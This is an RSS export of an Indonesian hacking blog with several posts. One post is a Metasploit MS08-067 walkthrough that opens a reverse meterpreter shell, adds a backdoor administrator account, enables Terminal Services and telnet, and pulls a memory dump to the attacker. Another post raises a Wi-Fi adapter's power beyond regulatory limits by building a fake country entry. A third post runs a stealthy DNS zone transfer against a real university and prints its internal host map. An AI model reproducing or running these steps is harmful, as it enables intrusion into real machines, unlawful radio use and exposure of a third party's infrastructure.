<pre class="brush:shell">msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(ms08_067_netapi) > set RHOST 192.168.1.106
RHOST => 192.168.1.106
msf  exploit(ms08_067_netapi) > set LHOST 192.168.1.109
LHOST => 192.168.1.109
msf  exploit(ms08_067_netapi) > exploit -f

[*] Started reverse handler on 192.168.1.109:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.109:4444 -> 192.168.1.106:1033) at 2012-02-06 08:26:21 +0700</pre>
<p># Upload DumpIt.exe</p>
<pre class="brush:shell">meterpreter > upload /root/gw/gear0wn/DumpIt/DumpIt.exe C:\</pre>
<p># Preparing service backdoor</p>
<pre class="brush:plain">reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f</pre>
<p># Set registry new value</p>
<pre class="brush:shell">meterpreter > reg setval -k 'HKLM\system\CurrentControlSet\Control\Terminal Server\' -v AllowTSConnections -t REG_DWORD -d 1
meterpreter > reg setval -k 'HKLM\system\CurrentControlSet\Control\Terminal Server\' -v fDenyTSConnections -t REG_DWORD -d 0
</pre>
<p># Check registry value</p>
<pre class="brush:shell">meterpreter > reg queryval -k 'HKLM\system\CurrentControlSet\Control\Terminal Server\' -v AllowTSConnections
meterpreter > reg queryval -k 'HKLM\system\CurrentControlSet\Control\Terminal Server\' -v fDenyTSConnections</pre>
<p># Restart telnet server</p>
<pre class="brush:shell">meterpreter > execute -f cmd.exe -i
Process 4004 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>net user
net user

User accounts for \\ANONYMOUS

-------------------------------------------------------------------------------
Administrator            Guest                    HelpAssistant
idiot                    SUPPORT_388945a0
The command completed successfully.

C:\WINDOWS\system32>

C:\Windows\system32\>tlntsvr.exe start
C:\Windows\system32\>net user gxrg let_us_in /add
C:\Windows\system32\>net localgroup Administrators gxrg /add
C:\Windows\system32\>sc config TermService start= auto
C:\Windows\system32\>net start Termservice
C:\Windows\system32\>sc config tlntsvr start= auto
C:\Windows\system32\>net start tlntsvr
</pre>
<p>Running Telnet ke mesin target, login sesuai user yang telah baru dibuat, lalu jalankan DumpIt, dan pencet y, lalu enter, tunggu beberapa saat, file raw akan dibuat, dan copy ke mesin attacker RAW tersebut, lalu delete user yang telah dibuat, dan logout meterpreter dengan smoothly :).</p>
<p>*dibutuhkan Telnet Server karena, NC dan default shell windows pada meterpreter suck tidak bisa menjalankan DumpIt, dikarenakan interface kedua tools tsb.</p>
<p>Artikel lanjutan dari ini akan ditulis, yaitu analisa forensik RAW Memory dari hasil Dumping.</p>
<p>Good Luck! ;p.</p>
]]></content:encoded>
			<wfw:commentRss>http://ray16.info/~me/?feed=rss2&#038;p=1268</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[BT5-R1] 2 Watt USB Wifi Adapter</title>
		<link>http://ray16.info/~me/?p=1224</link>
		<comments>http://ray16.info/~me/?p=1224#comments</comments>
		<pubDate>Sat, 28 Jan 2012 02:38:06 +0000</pubDate>
		<dc:creator>murray</dc:creator>
				<category><![CDATA[backtrack]]></category>
		<category><![CDATA[Computer]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[alfa AWUS036H 2000mW]]></category>
		<category><![CDATA[AWUS036H 2000mW]]></category>
		<category><![CDATA[backtrack AWUS036H 2 watt]]></category>
		<category><![CDATA[crda regulatory]]></category>
		<category><![CDATA[power up AWUS036H]]></category>
		<category><![CDATA[python m2crypto]]></category>
		<category><![CDATA[tx power alfa]]></category>
		<category><![CDATA[tx power AWUS036H 2000mW]]></category>

		<guid isPermaLink="false">http://ray16.info/~me/?p=1224</guid>
		<description><![CDATA[kemarin pas gw beli hardware baru (SignalKing) buat koleksi war driving gw, penjual nya bilang : penjual : "ini saya ada alfa 2 watt mau gak? tapi kalo di backtrack cuman bisa 1 watt (30dbm) mentok" gw : "enggak kok pak, bisa sampe berapa aja, sekuatnya alat" penjual : "loh saya coba waktu itu pake [...]]]></description>
			<content:encoded><![CDATA[<p>kemarin pas gw beli hardware baru (SignalKing) buat koleksi war driving gw, penjual nya bilang :</p>
<pre class="brush: plain"> penjual : "ini saya ada alfa 2 watt mau gak? tapi kalo di backtrack cuman bisa 1 watt (30dbm) mentok"
gw : "enggak kok pak, bisa sampe berapa aja, sekuatnya alat"
penjual : "loh saya coba waktu itu pake iw reg BO, mentok 30dbm"
gw : "iya, tapi kan itu bisa di edit, bikin negara baru aja pak, jangan terpaku sama Bolivia (BO)"
penjual : "ohhh saya kurang ngerti, hehehe"</pre>
<p>okey folks, kita sekarang bahas naikin power usb wifi adapter up to 2Watt. <strong>tutorial ini menggunakan contoh RT2870/RT3070 Wireless Adapter</strong>, dimana yang pake chipset Ralink ini banyak sekali, salah satu nya alfa hijau AWUS036H.</p>
<p><img src="http://ray16.info/~me/wp-content/uploads/2012/01/31lC3+abUcL._SS400_.jpg" alt="" title="31lC3+abUcL._SS400_" width="400" height="400" class="alignnone size-full wp-image-1225" /></p>
<p><strong>Update Driver Default Backtrack</strong></p>
<p>pertama, kita update dulu driver default bawaan live cd backtrack, kenapa mesti update? biasalah live cd, enggak stabil diurusan driver, karena pas developer build live cd itu di satu hardware, sementara kalo udah sampe ke tangan user yang berbagai macam jenis hardware, masalahnya udah beda / bakal tambah masalah ini lah itu lah, jadi lebih baik kita update driver setelah install live cd backtrack.</p>
<pre class="brush: shell">
root@bt:~# ln -s /usr/src/linux /lib/modules/2.6.39.4/build
root@bt:~# cd/usr/src/
root@bt:~# wget http://bt.gxrg.org/other/driver/wireless/compat-wireless/compat-wireless-2.6/compat-wireless-2012-01-22.tar.bz2
root@bt:~# tar jxpf compat-wireless-2011-07-14.tar.bz2
root@bt:~# wget http://www.backtrack-linux.org/2.6.39.patches.tar
root@bt:~# tar xpf 2.6.39.patches.tar
root@bt:~# cd compat-wireless-2012-01-22
root@bt:~# patch -p1 < ../patches/mac80211-2.6.29-fix-tx-ctl-no-ack-retry-count.patch
root@bt:~# patch -p1 < ../patches/mac80211.compat08082009.wl_frag+ack_v1.patch
root@bt:~# patch -p1 < ../patches/zd1211rw-2.6.28.patch
root@bt:~# patch -p1 < ../patches/ipw2200-inject.2.6.36.patch
root@bt:~# make
root@bt:~# make install
root@bt:~# reboot</pre>
<p><strong>Update Wireless Regulatory Database</strong></p>
<p>sekarang kita langsung update dan edit Wireless Reg Database, yang secara default di backtrack 5 - r1 masih ikut kernel biasa (ubuntu), entah kenapa sama developer backtrack ini enggak di edit.</p>
<pre class="brush: shell">
root@bt:~# wget http://wireless.kernel.org/download/wireless-regdb/wireless-regdb-2011.04.28.tar.bz2
root@bt:~# tar -jxf wireless-regdb-2011.04.28.tar.bz2
root@bt:~# cd wireless-regdb-2011.04.28
</pre>
<p>edit db.txt, lalu tambahin country XX di baris paling bawah, tambahin line seperti ini:</p>
<pre class="brush: shell">
root@bt:~/wireless-regdb-2011.04.28# nano db.txt

#kita akan buat negara baru, yaitu negara XX, negara bebas, sesuai user, tidak terpaku atas XX
#kita juga akan membuat semua adapter yang bekerja pada 2.4 GHz, dan 5 GHz bisa di power up kan.
#tambahin line dipaling bawah, seperti ini :

country XX:
        (2402 - 2492 @ 35), (N/A, 35)
        (4910 - 5835 @ 35), (N/A, 35)
</pre>
<p>setelah itu install dependencies yang dibutuhkan untuk compile make, yaitu python-m2crypto</p>
<pre class="brush: shell">
root@bt:~/wireless-regdb-2011.04.28# apt-get install python-m2crypto
</pre>
<p>lalu langsung compile (make)</p>
<pre class="brush: shell">
root@bt:~/wireless-regdb-2011.04.28# make
Generating regulatory.bin digitally signed by root...
./db2bin.py regulatory.bin db.txt ~/.wireless-regdb-root.key.priv.pem
sha1sum db.txt > sha1sum.txt
</pre>
<p>setelah selesai make, seperti diatas, lalu hasil dari make, yaitu regulatory.bin, kita copy paste ke CRDA.</p>
<pre class="brush: shell">
root@bt:~/wireless-regdb-2011.04.28# cp regulatory.bin /usr/lib/crda/
</pre>
<p>setelah itu kita upgrade CRDA ke versi paling baru selain untuk install ulang CRDA dengan custom Regulatory yang kita buat diatas.</p>
<pre class="brush: shell">
root@bt:~/# wget http://wireless.kernel.org/download/crda/crda-1.1.2.tar.bz2
root@bt:~/# tar -xvjf crda-1.1.2.tar.bz2
root@bt:~/# cd crda-1.1.2
</pre>
<p>copy pub key yang kita udah generate tadi lewat make diatas.</p>
<pre class="brush: shell">
root@bt:~/crda-1.1.2# cp ~/wireless-regdb-2011.04.28/root.key.pub.pem pubkeys/
</pre>
<p>install dependencies untuk make selanjutnya.</p>
<pre class="brush: shell">
root@bt:~/crda-1.1.2# apt-get install libnl-dev
</pre>
<p>setelah itu make, dan make install.</p>
<pre class="brush: shell">
root@bt:~/crda-1.1.2# make
root@bt:~/crda-1.1.2# make install
</pre>
<p>lalu reboot, </p>
<p><strong>Negara Baru XX, regulatory 35dBm (2000 mW)</strong></p>
<p>setelah reboot, set regulatory di negara XX (yang diatas tadi kita buat).</p>
<pre class="brush: shell">
root@bt:~# iw reg set XX
</pre>
<p>hasil :</p>
<pre class="brush: shell">
root@bt:~# iw list |grep 35
		Maximum RX AMPDU length 65535 bytes (exponent: 0x003)
			* 2412 MHz [1] (35.0 dBm)
			* 2417 MHz [2] (35.0 dBm)
			* 2422 MHz [3] (35.0 dBm)
			* 2427 MHz [4] (35.0 dBm)
			* 2432 MHz [5] (35.0 dBm)
			* 2437 MHz [6] (35.0 dBm)
			* 2442 MHz [7] (35.0 dBm)
			* 2447 MHz [8] (35.0 dBm)
			* 2452 MHz [9] (35.0 dBm)
			* 2457 MHz [10] (35.0 dBm)
			* 2462 MHz [11] (35.0 dBm)
			* 2467 MHz [12] (35.0 dBm)
			* 2472 MHz [13] (35.0 dBm)
</pre>
<p><img src="http://ray16.info/~me/wp-content/uploads/2012/01/img.babygore.com_.png" alt="" title="img.babygore.com" width="671" height="428" class="alignnone size-full wp-image-1235" /></p>
<p>Good Luck! ;p</p>
]]></content:encoded>
			<wfw:commentRss>http://ray16.info/~me/?feed=rss2&#038;p=1224</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Forensic dan Hacking Twitter: Men-visualisasikan Komunitas Hacker</title>
		<link>http://ray16.info/~me/?p=1242</link>
		<comments>http://ray16.info/~me/?p=1242#comments</comments>
		<pubDate>Wed, 25 Jan 2012 03:56:46 +0000</pubDate>
		<dc:creator>murray</dc:creator>
				<category><![CDATA[analysis]]></category>
		<category><![CDATA[Computer]]></category>
		<category><![CDATA[forensic]]></category>
		<category><![CDATA[anonyops twitter]]></category>
		<category><![CDATA[hacking twitter]]></category>
		<category><![CDATA[lulzsec twitter]]></category>
		<category><![CDATA[twitter API]]></category>
		<category><![CDATA[twitter forensic]]></category>

		<guid isPermaLink="false">http://ray16.info/~me/?p=1242</guid>
		<description><![CDATA[Hi there, ini gw ada artikel bagus dari https://sites.google.com/site/valkyriexsecurityresearch/blog/hackingtwittervisualizehackingcommunities, gw terjemahin ke Bahasa Indonesia, so lo lo semua dan terkhusus gw bisa jadiin ini sebagai panduan forensik aku twitter. &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211; Hari ini adalah Tahun baru Cina, Saya ingin mewakili VXRL untuk mengatakan &#8220;Kung Hei Fat Choy&#8221; untuk Anda semua. Sekarang sedang ngetop ngetop nya dua [...]]]></description>
			<content:encoded><![CDATA[<p>Hi there, ini gw ada artikel bagus dari <a href="https://sites.google.com/site/valkyriexsecurityresearch/blog/hackingtwittervisualizehackingcommunities" target="_blank">https://sites.google.com/site/valkyriexsecurityresearch/blog/hackingtwittervisualizehackingcommunities</a>, gw terjemahin ke Bahasa Indonesia, so lo lo semua dan terkhusus gw bisa jadiin ini sebagai panduan forensik aku twitter.</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>Hari ini adalah Tahun baru Cina, Saya ingin mewakili VXRL untuk mengatakan &#8220;Kung Hei Fat Choy&#8221; untuk Anda semua.</p>
<p>Sekarang sedang ngetop ngetop nya dua hacking tim, Lulzsec dan Anonymous, yang dimana mereka memberi tau setiap kegiatan mereka lewat Twitter. Saya penasaran apa saja yang dilakukan mereka, dan siapa saja yang menjadi koneksi mereka, dan saya akan membahasnya secara snapshot.</p>
<p><strong>Jaringan Retweet</strong><br />
Saya mulai dengan membuat program Python, lalu melakukan 100 request ke Twitter menggunakan Twitter API.</p>
<p>Menariknya, dari grafik Lulzsec, saya telah menemukan sejumlah kelompok yang sama / berkorelasi dengan Anonymous dan secara eksplisit yang menyatakan bahwa itu berasal dari Inggris, Swedia dan beberapa Bot IRC, saya percaya itu baik bagi mereka untuk memastikan tindakan mereka dan berita berhasil disebarkan, apalagi jika Twitter menutup salah satu dari rekening mereka, sementara itu, saya bisa menebak kekuatan utama mereka (atau sukarelawan?) berasal dari Eropa.</p>
<p>Akun-akun twitter yang mendukung Anonymous (mungkin dimiliki oleh mereka atau sukarelawan) meliputi:<br />
- YourAnnoNews<br />
- AnonOpsSweden<br />
- AnonOpsBrazil<br />
- AnonymousIRC<br />
- BritAnonymous<br />
- AnonymousBrazil<br />
- AnonymousOnly</p>
<p>Dari grafik yang ada, menunjukkan kalo AnonOpeSweden bertindak sebagai team inti, karena AnonOpsSweden di follow oleh setiap anggota / team / grup.</p>
<p>Sementara LulzSec, meliputi:<br />
- LulzSec<br />
- LulzSec47<br />
- LulzSecBrazil</p>
<p>Hal ini cukup menarik bahwa selain Eropa, kita bisa menemukan kelompok-kelompok dari Brasil mendukung kedua LulzSec dan Anonymous. Apakah berarti operasi besar berada di Brasil juga? :)</p>
<p>Liat gambar: Korelasi Kegiatan antara Anonymous &#038; LulzSec<br />
<a href="http://ray16.info/~me/wp-content/uploads/2012/01/Screen-shot-2012-01-23-at-8.03.20-PM.png"><img src="http://ray16.info/~me/wp-content/uploads/2012/01/Screen-shot-2012-01-23-at-8.03.20-PM-1024x230.png" alt="" title="Screen shot 2012-01-23 at 8.03.20 PM" width="1024" height="230" class="alignnone size-large wp-image-1245" /></a></p>
<p>Gambar berikut menunjukkan, bahwa hampir dari semua anggota Anonymous memfollow AnonOpsSweden<br />
<img src="http://ray16.info/~me/wp-content/uploads/2012/01/Screen-shot-2012-01-23-at-8.03.20-PM1.png" alt="" title="Screen shot 2012-01-23 at 8.03.20 PM" width="577" height="258" class="alignnone size-full wp-image-1247" /></p>
<p>Gambar diatas menunjukkan Lulzsec dan Anonymous mempunyai hubungan kedekatan.</p>
<p><strong>Penjelasan Lebih Lanjut.</strong></p>
<p>Saya akan membuat jalur AnonOpsSweden. Saya mendapatkan 2 twitter account lagi yang menarik, AnonCentral dan AnonyOps, yang menunjukan bahwa &#8220;Anonymous ada di semua tempat&#8221;.</p>
<p><a href="http://ray16.info/~me/wp-content/uploads/2012/01/Screen-shot-2012-01-23-at-8.03.20-PM2.png"><img src="http://ray16.info/~me/wp-content/uploads/2012/01/Screen-shot-2012-01-23-at-8.03.20-PM2-1024x277.png" alt="" title="Screen shot 2012-01-23 at 8.03.20 PM" width="1024" height="277" class="alignnone size-large wp-image-1248" /></a></p>
<p>Gambar diatas menunjukkan adanya akun twitter baru.</p>
<p><strong>Topik menarik lainnya.</strong></p>
<p>Baiklah, ini adalah pembahasan utama, dan perkiraan apa yang akan dilakukan oleh mereka? Saya membuat simple query dengan kata kunci &#8220;DDoS&#8221; dengan menggunakan Python.</p>
<pre class='brush: plain'>>>> import twitter
>>> import json
>>> twitter_search = twitter.Twitter(domain="search.twitter.com")
>>> search_results = []
>>> search_results = twitter_search.search(q="DDoS")
>>> print json.dumps(search_results, sort_keys=True, indent=1)</pre>
<p>Dengan mudahnya saya menemukan konversasi dengan kata kunci &#8220;DDoS&#8221; dengan hasil hingga 2345 pada 23 Jan 2012 (HKT), Hemm mereka nampaknya sudah mempunyai sukarelawan untuk melakukan DDoS Attack.</p>
<p><a href="http://ray16.info/~me/wp-content/uploads/2012/01/Screen-shot-2012-01-23-at-8.03.20-PM3.png"><img src="http://ray16.info/~me/wp-content/uploads/2012/01/Screen-shot-2012-01-23-at-8.03.20-PM3-1024x586.png" alt="" title="Screen shot 2012-01-23 at 8.03.20 PM" width="1024" height="586" class="alignnone size-large wp-image-1250" /></a></p>
<p>Sebagai seorang pengamat, itu bagus bagi kita untuk memiliki tindakan terbaru mereka dan juga rencana terbaru mereka, saya menghargai pola pikir Anonymous dan Lulzsec untuk mengubah pola pikir orang lain untuk membuat keamanan yang lebih baik, tapi bisa kita gunakan maksud lain? Namun, ini adalah dilema, etika dan keadilan terlihat seperti itu tidak dapat seimbang dalam dunia nyata, beberapa tugas memang harus diserahkan kepada para hacker.</p>
<p>Enjoy it ;-)</p>
]]></content:encoded>
			<wfw:commentRss>http://ray16.info/~me/?feed=rss2&#038;p=1242</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>DNS Pentesting.</title>
		<link>http://ray16.info/~me/?p=1214</link>
		<comments>http://ray16.info/~me/?p=1214#comments</comments>
		<pubDate>Sat, 21 Jan 2012 15:34:09 +0000</pubDate>
		<dc:creator>murray</dc:creator>
				<category><![CDATA[analysis]]></category>
		<category><![CDATA[backtrack]]></category>
		<category><![CDATA[Computer]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[dinus proxy]]></category>
		<category><![CDATA[dinus recon]]></category>
		<category><![CDATA[dinus scan]]></category>
		<category><![CDATA[dinus.ac.id]]></category>
		<category><![CDATA[dns mapping]]></category>
		<category><![CDATA[dns recon]]></category>
		<category><![CDATA[dns scanning]]></category>
		<category><![CDATA[fierce dns]]></category>
		<category><![CDATA[fierce pl]]></category>

		<guid isPermaLink="false">http://ray16.info/~me/?p=1214</guid>
		<description><![CDATA[hari ini kita bakalan bahas dns pentesting, dimana ini termasuk Reconnaissance, dimana kita gathering info tentang target. kalo menurut gw, dns pentesting itu sama kayak nambang, semakin kita dalem, dan ulet buat nambang, dijamin target akan semakin terlihat jelas, karena untuk menjadi seorang pentester, kita harus melihat kondisi network, oleh karena itu kita harus punya [...]]]></description>
			<content:encoded><![CDATA[<p>hari ini kita bakalan bahas dns pentesting, dimana ini termasuk Reconnaissance, dimana kita gathering info tentang target.</p>
<p>kalo menurut gw, dns pentesting itu sama kayak nambang, semakin kita dalem, dan ulet buat nambang, dijamin target akan semakin terlihat jelas, karena untuk menjadi seorang pentester, kita harus melihat kondisi network, oleh karena itu kita harus punya kemampuan mapping network.</p>
<p><strong>fierce</strong></p>
<p>fierce domain scan, lahir setelah pencipta fierce (rsnake) stress saat melakukan web pentest.</p>
<p>fierce dapat men scan DNS domain secara deep, dan disediakan wordlist untuk bruteforce subdomain lalu menscan nya.</p>
<p>command utama ialah</p>
<pre class="brush: shell">
root@bt:/pentest/enumeration/dns/fierce# perl fierce.pl -dns ray16.info
DNS Servers for ray16.info:
        ns1.dreamhost.com
        ns3.dreamhost.com
        ns2.dreamhost.com

Trying zone transfer first...
        Testing ns1.dreamhost.com
                Request timed out or transfer not allowed.
        Testing ns3.dreamhost.com
                Request timed out or transfer not allowed.
        Testing ns2.dreamhost.com
                Request timed out or transfer not allowed.

Unsuccessful in zone transfer (it was worth a shot)
Okay, trying the good old fashioned way... brute force

Checking for wildcard DNS...
Nope. Good.
Now performing 1895 test(s)...
^C
</pre>
<p>secara default fierce akan menscan, lalu mencoba melakukan simulasi zone transfer (untuk memastikan duplicating DNS Zone). dan me mapping dns yang misconfiguration.</p>
<p>pada kasus diatas, kasus scanning domain gw (ray16.info) mentok di zone transfer dikarenakan dreamhost sebagai hosting server gw sudah secara benar menolak adanya scanning zone transfer, sehingga fierce akan melakukan bruteforce subdomain sebanyak 1895 kali.</p>
<p>diatas gw cancel, karena bakal lamaaa.</p>
<p><strong>DIG</strong></p>
<p>okey langkah selanjutnya ialah menganalisa trace path menggunakan DIG, kita harus tau ns server yang di query recursive itu mana saja.</p>
<pre class="brush: shell">
root@bt:/pentest/enumeration/dns/fierce# dig ray16.info +trace

; <<>> DiG 9.7.0-P1 <<>> ray16.info +trace
;; global options: +cmd
.                       8672    IN      NS      k.root-servers.net.
.                       8672    IN      NS      l.root-servers.net.
.                       8672    IN      NS      g.root-servers.net.
.                       8672    IN      NS      a.root-servers.net.
.                       8672    IN      NS      j.root-servers.net.
.                       8672    IN      NS      h.root-servers.net.
.                       8672    IN      NS      m.root-servers.net.
.                       8672    IN      NS      d.root-servers.net.
.                       8672    IN      NS      f.root-servers.net.
.                       8672    IN      NS      b.root-servers.net.
.                       8672    IN      NS      i.root-servers.net.
.                       8672    IN      NS      e.root-servers.net.
.                       8672    IN      NS      c.root-servers.net.
;; Received 228 bytes from 8.8.8.8#53(8.8.8.8) in 25 ms

info.                   172800  IN      NS      a0.info.afilias-nst.info.
info.                   172800  IN      NS      a2.info.afilias-nst.info.
info.                   172800  IN      NS      b0.info.afilias-nst.org.
info.                   172800  IN      NS      b2.info.afilias-nst.org.
info.                   172800  IN      NS      c0.info.afilias-nst.info.
info.                   172800  IN      NS      d0.info.afilias-nst.org.
;; Received 431 bytes from 199.7.83.42#53(l.root-servers.net) in 108 ms

ray16.info.             86400   IN      NS      ns1.dreamhost.com.
ray16.info.             86400   IN      NS      ns2.dreamhost.com.
ray16.info.             86400   IN      NS      ns3.dreamhost.com.
;; Received 95 bytes from 199.249.113.1#53(a2.info.afilias-nst.info) in 15 ms

ray16.info.             14400   IN      A       69.163.228.209
;; Received 44 bytes from 66.33.206.206#53(ns1.dreamhost.com) in 195 ms
</pre>
<p>diatas terlihat jelas bahwa saat ada request TCP ke ray16.info, maka NS akan melakukan query pertama kali ke DNS Google (8.8.8.8) lalu ke l.root-servers.net (199.7.83.42) lalu ke a2.info.afilias-nst.info (199.249.113.1) lalu ke server DNS terakhir yaitu ns1.dreamhost.com (66.33.206.206).</p>
<p>nah tugas dasar kita analisa setiap lompatan server, analisa setiap port yang kebuka, bagaimana kita bisa melakukan penetrasi, bangun pola serangan (contoh serangan ada dibawah) yang bagus.</p>
<p>okey sisanya bisa belajar sendiri, sekarang kita akan langsung ke domain yang VULNERABLE dikarenakan misconfiguration DNS Server.</p>
<p><strong>VULNERABLE DOMAIN EXAMPLE.</strong></p>
<p>kita akan coba membahas VULNERABLE Domain yang bisa sangat fatal jika attacker berniat melakukan mass attack tidak hanya tertuju ke satu server tapi kesemua server (contoh DDOS).</p>
<p>gw pake proxychains untuk stealth scan, karena gw gak mau resiko ketawan scan network orang, so be clean.</p>
<pre class="brush: shell">
root@bt:/pentest/enumeration/dns/fierce# proxychains perl fierce.pl -dns dinus.ac.id
ProxyChains-3.1 (http://proxychains.sf.net)
DNS Servers for dinus.ac.id:
	ns1.dinus.ac.id
	ns2.dinus.ac.id
	ns3.dinus.ac.id
	ns4.dinus.ac.id

Trying zone transfer first...
	Testing ns1.dinus.ac.id

Whoah, it worked - misconfigured DNS server found:
dinus.ac.id.	86400	IN	SOA	ns1.dinus.ac.id. admin.dinus.ac.id. (
					2012011925	; Serial
					10800	; Refresh
					3600	; Retry
					604800	; Expire
					86400 )	; Minimum TTL
dinus.ac.id.	86400	IN	A	103.246.107.33
dinus.ac.id.	86400	IN	TXT	"v=msv1" "t=98801ad9cb59bb4c9f0542b52c571c"
dinus.ac.id.	86400	IN	TXT	"v=spf1" "include:outlook.com" "~all"
dinus.ac.id.	86400	IN	NS	ns1.dinus.ac.id.
dinus.ac.id.	86400	IN	NS	ns2.dinus.ac.id.
dinus.ac.id.	86400	IN	NS	ns3.dinus.ac.id.
dinus.ac.id.	86400	IN	NS	ns4.dinus.ac.id.
dinus.ac.id.	86400	IN	MX	10 mailserver.dinus.ac.id.
dinus.ac.id.	86400	IN	MX	20 mailserver.dinus.ac.id.
academic.dinus.ac.id.	86400	IN	CNAME	webpsi.dinus.ac.id.
admin.dinus.ac.id.	86400	IN	CNAME	webserver.dinustech.com.
administrator1.dinus.ac.id.	86400	IN	A	103.246.107.65
administrator1.dinus.ac.id.	86400	IN	HINFO	"iC2D-2800MHz/2GB" "M$ Widow"
administrator1.dinus.ac.id.	86400	IN	TXT	"Komputer Administrator"
alumni.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
aset.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
autodiscover.dinus.ac.id.	86400	IN	CNAME	autodiscover.outlook.com.
beasiswaunggulan.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
bem-fik.dinus.ac.id.	86400	IN	CNAME	webhost.dinustech.com.
biku.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
bima.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
blocked.dinus.ac.id.	86400	IN	CNAME	webserver.dinustech.com.
calendar.dinus.ac.id.	86400	IN	CNAME	go.domains.live.com.
cc.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
dataku.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
db.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
devel.dinus.ac.id.	86400	IN	A	103.246.107.67
dkv.dinus.ac.id.	86400	IN	CNAME	webhost.dinustech.com.
dncc.dinus.ac.id.	86400	IN	CNAME	webhost.dinustech.com.
doscom.dinus.ac.id.	86400	IN	CNAME	pascasarjana.dinus.ac.id.
dosen.dinus.ac.id.	86400	IN	A	103.246.107.33
dosen.dinus.ac.id.	86400	IN	MX	22 mailserver.dinus.ac.id.
dss.dinus.ac.id.	86400	IN	A	103.246.107.77
dss.dinus.ac.id.	86400	IN	HINFO	"Mikrotik" "MT"
dss.dinus.ac.id.	86400	IN	TXT	"PC-Router"
e-gamelanku.dinus.ac.id.	86400	IN	CNAME	webhost.dinustech.com.
ecollege.dinus.ac.id.	86400	IN	CNAME	webhost.dinustech.com.
eprints.dinus.ac.id.	86400	IN	CNAME	webpsi.dinus.ac.id.
fbs.dinus.ac.id.	86400	IN	A	103.246.107.34
fbs.dinus.ac.id.	86400	IN	MX	29 mailserver.dinus.ac.id.
fe.dinus.ac.id.	86400	IN	A	103.246.107.34
fe.dinus.ac.id.	86400	IN	MX	26 mailserver.dinus.ac.id.
fik.dinus.ac.id.	86400	IN	A	103.246.107.34
fik.dinus.ac.id.	86400	IN	MX	25 mailserver.dinus.ac.id.
files.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
fkm.dinus.ac.id.	86400	IN	A	103.246.107.34
fkm.dinus.ac.id.	86400	IN	MX	28 mailserver.dinus.ac.id.
freemail.dinus.ac.id.	86400	IN	CNAME	siteurl.everyone.net.
ft.dinus.ac.id.	86400	IN	A	103.246.107.34
ft.dinus.ac.id.	86400	IN	MX	27 mailserver.dinus.ac.id.
ftp.dinus.ac.id.	86400	IN	CNAME	gateway.dinus.ac.id.
gateway.dinus.ac.id.	86400	IN	A	103.246.107.30
gateway.dinus.ac.id.	86400	IN	HINFO	"iCore2Duo-2800MHz/2GB" "Linux"
gateway.dinus.ac.id.	86400	IN	TXT	"Gateway Utama"
groups.dinus.ac.id.	86400	IN	CNAME	go.domains.live.com.
highground.dinus.ac.id.	86400	IN	CNAME	webpsi.dinus.ac.id.
hmti.dinus.ac.id.	86400	IN	CNAME	webhost.dinustech.com.
_sipfederationtls._tcp.dinus.ac.id.dinus.ac.id.	86400	IN	SRV	10 2 5061 federation.messenger.msn.com.
igos.dinus.ac.id.	86400	IN	CNAME	webhost.dinustech.com.
ikc.dinus.ac.id.	86400	IN	CNAME	hostingserver1.dinustech.net.
voip.inherent.dinus.ac.id.	86400	IN	RP	admin.dinus.ac.id. bhian.dinus.ac.id.
voip.inherent.dinus.ac.id.	86400	IN	A	167.205.134.50
intranet.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
irc.dinus.ac.id.	86400	IN	CNAME	gateway.dinus.ac.id.
kms.dinus.ac.id.	86400	IN	A	103.246.107.59
komunitas.dinus.ac.id.	86400	IN	CNAME	ccommunity.everyone.net.
kpm.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
kuliah.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
kulino.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
lgb.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
library.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
localhost.dinus.ac.id.	86400	IN	A	127.0.0.1
lppm.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
mahasiswa.dinus.ac.id.	86400	IN	CNAME	webpsi.dinus.ac.id.
mail.dinus.ac.id.	86400	IN	CNAME	mailserver.dinus.ac.id.
mailserver.dinus.ac.id.	86400	IN	A	103.246.107.36
mailserver.dinus.ac.id.	86400	IN	HINFO	"iPXeon-1860MHz/2048MB" "Linux"
